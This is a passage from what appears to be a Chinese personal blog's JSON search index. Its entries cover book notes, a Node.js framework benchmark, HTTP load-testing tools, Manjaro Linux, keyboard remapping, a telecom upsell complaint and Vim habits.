2560桃花潭水深千尺,不及汪伦送我情”,\n","permalink":"https://wdd.js.org/posts/2021/06/rml5uy/","summary":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,","title":"一日看尽长安花——听北大教授畅讲中国古代文学"},{"content":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","permalink":"https://wdd.js.org/posts/2021/06/qpdnp4/","summary":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","title":"6月书单"},{"content":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","permalink":"https://wdd.js.org/fe/js-101-question/","summary":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","title":"Js 101 Question"},{"content":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","permalink":"https://wdd.js.org/posts/2021/06/sxwh8v/","summary":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","title":"1分钟将微信网页版转为桌面应用"},{"content":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.58 113.03 830.00 84.97% 72034 requests in 10.10s, 17.31MB read Requests/sec: 7134.75 Transfer/sec: 1.71MB # fastify.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.26ms 5.73ms 105.76ms 96.26% Req/Sec 2.08k 490.82 14.63k 94.92% 249114 requests in 10.09s, 44.43MB read Requests/sec: 24688.94 Transfer/sec: 4.40MB fastify是express的3.4倍, 所以对性能有所追求的话,最好用fastify。\n","permalink":"https://wdd.js.org/fe/perf-test-express-fastify/","summary":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.","title":"Perf Test Express Fastify"},{"content":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting. Details are available in SCRIPTING and several examples are located in scripts/.\n安装 git clone https://github.com/wg/wrk.git cd wrk make sudo ln -s $PWD/wrk /usr/bin/wrk 基本使用 wrk -t12 -c400 -d30s http://127.0.0.1:8080/index.html Running 30s test @ http://127.0.0.1:8080/index.html 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 635.91us 0.89ms 12.92ms 93.69% Req/Sec 56.20k 8.07k 62.00k 86.54% 22464657 requests in 30.00s, 17.76GB read Requests/sec: 748868.53 Transfer/sec: 606.33MB k6 k6 is a modern load testing tool, building on our years of experience in the load and performance testing industry. It provides a clean, approachable scripting API, local and cloud execution, and flexible configuration.This is how load testing should look in the 21st century.\nhttps://github.com/k6io/k6 go语言开发 优点 支持使用脚本开发测试 功能强大 \u0026hellip;\u0026hellip; 支持将测试结果直接写入influxdb, 这是亮点啊 缺点 如果你只想用几个参数来测试接口,大可不必用k6 安装 # macos brew install k6 // 其他平台也是支持的,参考官方文档 autocannon Javascript/Node.js https://github.com/mcollina/autocannon 优点 如果你是Node.js开发者,安装autocannon是非常简单的 安装 npm i autocannon -g 使用 ali https://github.com/nakabonne/ali go语言开发 特点 支持自动在控制台绘图 安装 brew install nakabonne/ali/ali ","permalink":"https://wdd.js.org/posts/2021/05/fxv15g/","summary":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting.","title":"5个接口压力测试工具"},{"content":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility. https://wiki.manjaro.org/index.php/About_Manjaro\nhttps://wiki.manjaro.org/index.php/Manjaro:A_Different_Kind_of_Beast https://wiki.manjaro.org/index.php/Manjaro_FAQ https://wiki.manjaro.org/index.php/Main_Page https://wiki.manjaro.org/index.php/Using_Manjaro_for_Beginners ","permalink":"https://wdd.js.org/posts/2021/05/cntrwh/","summary":"overview 我主要使用过4个操纵系统。windows,macos,ubuntu,manjaro,每个操作系统,我都有上年或者上月的使用体会。\n如果你是普通用户,无论工作还是学习,都不涉及到写代码的话。windows和mac是最好的选择,如果你是一名开发人员,那么macos,ubuntu和manjaro都是可以选择的。\n我是一个很容易接受操切换作系统改变的人,从每个系统上我都可以很顺畅的切换。但是并不是所有人都是如此,有些人即使用了一年多的mac,还是无法接受,最终又换回了windows。\nchangelog 大学到工作第一年,我一直用windows,满足各种需求 工作第二年,我换了mac。因为我想轻便的笔记本,另外也想尝尝鲜。mac的屏幕、界面UI、触摸板都是值得称道的地方,键盘体验就不足人意了。 从mac切换到ubuntu, macbook使用接近4年了。明显感觉到一些性能上的不足,刚好又发现一台空闲的台式机没人用,台式机性能不错,之前是做服务器的,CPU、内存、磁盘资源都比较丰富。然后我就在上面安装了ubuntu。系统的初始化软件安装有些折腾人,要安装中文输入法,常见的软件例如微信和QQ, 安装还是有些难度的。ubuntu刚开始使用还是比较流畅的,但是接下来遇到非常致命的问题,UI经常卡死。查下来发现和Xorg以及系统的显卡有关,网上搜了下,很多人遇到类似的问题,也尝试了一些解决方案,但是还是无法解决。索性我就关了ubuntu的图形界面,仅仅ssh远程开发。 从ubuntu切换到macos, 恢复到之前的状态,感觉很好。但是看到macbook pro上接的扩展坞,以及被各种线缆高的乱糟糟的桌面,想尝试其他Linux发行版的想法又在心里悄悄发了芽,一路疯长。 道除了ubuntu, 就没有其他选择了吗?调研一番,发现了manjaro这个发行版,用户评价很不错。然后我就试试看,结果发现安装各种软件比ubuntu方便多了,试用了几天,也是越来越喜欢。又发现了一个宝藏发行版。 其实我一直对manjaro这个单词又很大的好奇,这个英文名是什么意思呢?词典上没有对这个英文词的介绍,只是说是一个linux发行版。 manjaro 什么意思?如何发音? marjaro这个词来自kilimanjaro, 乞力马扎罗是非洲最高的高山,这座山是由于火山爆发所产生的,这个可能比较贴合marjaro的滚动发布的特点,也说明这个发行版是比较活跃的吧。\nAlthough the inspiration for the name originates from Mount Kilimanjaro, it may be pronounced as \u0026lsquo;Man-jar-o\u0026rsquo; or as \u0026lsquo;Man-ha-ro\u0026rsquo;. https://wiki.manjaro.org/index.php/Manjaro_FAQ\n乞力马扎罗山(斯瓦西里语:Kilimanjaro,意为“灿烂发光的山”)位于坦桑尼亚东北的乞力马扎罗区,临近肯尼亚边界,是非洲的最高山,常被称为“非洲屋脊”、“非洲之王”。其最高峰为基博峰(也称乌呼鲁峰),海拔5895米。\nmanjaro发行版的特点 图形化安装界面,非常方便 自带图形界面 自动硬件检测,图形化支持做的比ubuntu好太多 滚动更新 非常多的包,可以使用AUR来安装包 相比与Arch, manjaro对新手非常友好 参考 https://manjaro.org/terms-of-use/ Developed in Austria, France, and Germany, Manjaro provides all the benefits of the Arch operating system combined with a focus on user-friendliness and accessibility.","title":"又发现了一个宝藏linux发行版 manjaro"},{"content":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","permalink":"https://wdd.js.org/posts/2021/05/xneq08/","summary":"获取环境变量 Authorization: \u0026#34;Basic {tavern.env_vars.SECRET_CI_COMMIT_AUTH}\u0026#34; x-www-form-urlencoded request: url: \u0026#34;{test_host}/form_data\u0026#34; method: POST data: id: abc123 按照name过滤运行测试 -k This can then be selected with the -k flag to pytest - e.g. pass pytest-kfake to run all tests with ‘fake’ in the name.\n比如只运行名称包含fake的测试\npy.test -k fake ","title":"tavern"},{"content":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension\n","permalink":"https://wdd.js.org/posts/2021/05/eafyk8/","summary":"大写锁定键一般都是非常鸡肋的功能。\n仅仅一次生效 setxkbmap -option caps:escape 大写锁定键改为esc setxkbmap -option ctrl:nocaps 大写锁定键改为ctrl 永久生效 /etc/X11/xorg.conf.d/90-custom-kbd.conf Section \u0026#34;InputClass\u0026#34; Identifier \u0026#34;keyboard defaults\u0026#34; MatchIsKeyboard \u0026#34;on\u0026#34; Option \u0026#34;XKbOptions\u0026#34; \u0026#34;caps:escape\u0026#34; EndSection 注销或者重启后生效\nhttps://superuser.com/questions/566871/how-to-map-the-caps-lock-key-to-escape-key-in-arch-linuxhttps://wiki.archlinux.org/title/X_keyboard_extension","title":"大写锁定键映射为escape"},{"content":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。\n","permalink":"https://wdd.js.org/posts/2021/05/wsoivr/","summary":"笔记本导出牛津通识读本:数学(中文版)蒂莫西·高尔斯\n第二章 数与抽象标注(黄色) - 位置 483重要的只是它们所遵循的规则。标注(黄色) - 位置 486我们通过接受 i作出小小的投资,结果得到了许多倍的回报。","title":"牛津通识读本:数学(中文版)笔记"},{"content":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧\n","permalink":"https://wdd.js.org/posts/2021/05/uvq06k/","summary":"第一章 人生的起点标注(黄色) - 位置 44他对我说,只有那些穷到走投无路,或心怀大志的巨富,才会选择出海冒险,想让自己以非凡的事业扬名于世。\n走投无路的穷人剩下的只是作为动物的本能,怎么可能和心怀大志的巨富相提并论呢\n标注(黄色) - 位置 194在去伦敦的路上,以及到了伦敦以后,我内心一直剧烈挣扎,我到底该选什么样的人生道路,我该回家还是该航海?\n我相信,每个人都有面对人生道路的艰难抉择的时候。\n第三章 荒岛遇难标注(黄色) - 位置 621“因为突来的欣喜,如同突来的悲伤,都令人难以承受。”\n悲伤与快乐都是来自比较。\n第六章 生病以及良心有愧标注(黄色) - 位置 1193大麦刚刚长出来的时候,我曾深受感动,第一次认为那是上帝显示的神迹。不过后来发现那不是神迹以后,所有从它而来的感动就随之消失了。\n无法解释的时候,才会想到鬼神。\n第九章 小船标注(黄色) - 位置 1701我认为,我们之所以感到缺乏和不满足,是因为我们对已经拥有的东西缺少感恩之心。\n看到苹果又出了新手机,macbook pro又出了新款的m1笔记本,对比我本自己目前手中所拥有的东西,你真的珍惜过吗? 得不到的永远在骚动 \u0026ndash;《红玫瑰》\n第十章 驯养山羊标注(黄色) - 位置 1797我在统治这岛——或者说,被囚禁在这岛——的第六年的十一月六日\n你在获得无尽的自由的时候,也被自由所囚禁。\n第十七章 叛乱者到访标注(黄色) - 位置 3187你知道,”他说,“以色列的百姓一开始获救离开埃及的时候,人人欢欣鼓舞,但是,当他们在旷野里缺乏面包时,他们甚至背叛了拯救他们的\n人性而已\n第十九章 重返英国标注(黄色) - 位置 3714等医生问明了病因之后,他给我放了血,之后我才放松下来,逐渐好转。\n我曾听过放血疗法,没想到还真的在小说中看过。\n标注(黄色) - 位置 3715我相信,如果当时没有用放血来舒缓我激动的情绪,我早就死了。\n第二十章 星期五与熊之战标注(黄色) - 位置 4018那条船上除了一些必需品,我还给他们送了七个女人去。她们是我亲自鉴别的,有的适于干活,有的适于做老婆,只要那边有人愿意娶她们。\n惊讶了,鲁滨逊在那里找到的女人,是奴隶吗?\n标注(黄色) - 位置 4025以及我个人在后续十多年中各种新的冒险和奇遇,我会在我的第二部冒险故事中一一叙述。\n好像没有第二部吧","title":"鲁滨逊漂流记 笔记与读后感"},{"content":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.\n参考 https://nodejs.org/api/cli.html#cli_max_old_space_size_size_in_megabytes https://stackoverflow.com/questions/54919258/ng-commands-throws-insufficient-memory-error-fatal-process-oom-in-insufficient https://medium.com/@vuongtran/how-to-solve-process-out-of-memory-in-node-js-5f0de8f8464c ","permalink":"https://wdd.js.org/fe/oom-in-insufficient-memory/","summary":"环境: ARM64\n\u0026lt;--- Last few GCs ---\u0026gt; \u0026lt;--- JS stacktrace ---\u0026gt; # # Fatal process OOM in insufficient memory to create an Isolate # 在Dockerfile上设置max-old-space-size的node.js启动参数, 亲测有效。\nCMD node --report-on-fatalerror --max-old-space-size=1536 dist/index.js Currently, by default v8 has a memory limit of 512mb on 32-bit and 1gb on 64-bit systems. You can raise the limit by setting \u0026ndash;max-old-space-size to a maximum of ~1gb for 32-bit and ~1.7gb for 64-bit systems. But it is recommended to split your single process into several workers if you are hitting memory limits.","title":"Fatal process OOM in insufficient memory to create an Isolate"},{"content":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","permalink":"https://wdd.js.org/posts/2021/05/ae2rme/","summary":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","title":"官方客服也开始割韭菜"},{"content":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?\n","permalink":"https://wdd.js.org/vim/why-you-leave-vim/","summary":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 